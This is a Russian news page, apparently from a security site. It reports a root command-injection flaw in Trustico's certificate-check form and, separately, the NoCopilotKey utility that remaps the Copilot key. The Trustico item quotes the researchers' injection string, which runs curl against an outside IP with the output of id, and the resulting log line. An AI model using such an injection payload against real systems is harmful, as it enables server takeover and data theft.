Все сертификаты Trustico отзовут из-за полной компрометации сервера

Все сертификаты Trustico отзовут из-за полной компрометации сервера

Все сертификаты Trustico отзовут из-за полной компрометации сервера

Ранее освещенная история с проблемными сертификатами, полученными через реселлера Trustico, усугубилась новыми подробностями. В веб-интерфейсе сервиса была обнаружена уязвимость, позволяющая получить к серверу root-доступ.

Если раньше эксперты только гадали, что может быть причиной того, что Trustico решила отозвать выданные сертификаты, то сейчас ситуация начинает проясняться. Похоже, что такое решение связано с киберинцидентом, подорвавшим безопасность реселлера.

Сама брешь имеет довольно посредственный характер — допускается ввод без экранирования спецсимволов. Таким образом, если кто-либо введет в форме проверки сертификата шелл-операторы, они будут исполнены на серверы с правами root.

Об этой проблеме сообщили эксперты Manawyrm и Predrag Cujanović в Twitter.

В качестве примера специалисты приводят ввод следующую строку:

$(curl https://3.5.6.9/`id`)

Которая отправит на хост запрос:

3.5.6.9 - [01/Mar/2018:09:52:14 -0500] "GET /uid=0(root) HTTP/1.1" 404 209 "-" "curl/7.29.0"

Сообщается, что на данный момент сайт Trustico недоступен. Специалистам пока не удалось выяснить, позволяет ли данная брешь скомпрометировать приватные ключи сертификатов, однако одному из исследователей удалось найти в конфигурации секретный ключ для SSL-сертификта домена «*.trustico.com».

Следовательно, в ближайшее время DigiCert и Comodo отреагируют на инцидент, что, скорее всего, приведет к отзыву всех выданных через Trustico сертификатов.

В Windows появился способ избавиться от клавиши Copilot

Пока Microsoft продолжает продвигать Copilot в Windows, сторонние разработчики занялись обратным процессом — убирают его из самых неожиданных мест. На GitHub появилась небольшая утилита NoCopilotKey, которая позволяет превратить физическую клавишу Copilot обратно в правый Ctrl.

На части новых Copilot+ PC производители заменили правый Ctrl отдельной клавишей Copilot.

Формально это не было жёстким требованием Microsoft для сертификации устройств, но компания продвигала такой вариант клавиатуры как быстрый способ запуска своего ИИ-помощника.

Проблема в том, что для части пользователей такая замена оказалась скорее раздражающей, чем полезной. Правый Ctrl — клавиша вполне рабочая и привычная, особенно для шорткатов, специфических сценариев работы и некоторых приложений. А вот отдельная кнопка для Copilot нужна далеко не всем. Именно на таких пользователей и рассчитан NoCopilotKey.

Утилита работает через хук клавиатуры на низком уровне: она перехватывает сигналы от клавиши Copilot, блокирует их и подменяет на поведение правого Ctrl. Разработчик отдельно поясняет, что сама кнопка Copilot не отправляет один простой код, а использует комбинацию событий, из-за чего стандартные методы переназначения часто работают криво или вообще не работают.

Собственно, в этом и заключается причина появления таких решений. Хотя PowerToys и другие инструменты умеют переназначать клавиши, с Copilot-кнопкой всё оказалось не так просто. Её поведение нестандартное, а Microsoft ещё и убирала из Windows 11 возможность штатного ремапа этой клавиши, объясняя это багами.

На этом фоне NoCopilotKey выглядит как очень нишевая, но вполне понятная утилита: она нужна не всем, но для владельцев ноутбуков, где Copilot буквально занял место правого Ctrl, такая мелочь может оказаться неожиданно полезной. Тем более что недовольство самой идеей отдельной клавиши Copilot в пользовательских и девелоперских сообществах звучит уже не первый месяц.

Ранее мы писали про инструмент, вырезающий Copilot и ИИ из Windows 11. Пользователь GitHub под ником zoicware выложил скрипт RemoveWindowsAI, который предназначен для радикального отключения ИИ-функций в Windows 11 на системном уровне.

RSS: Новости на портале Anti-Malware.ru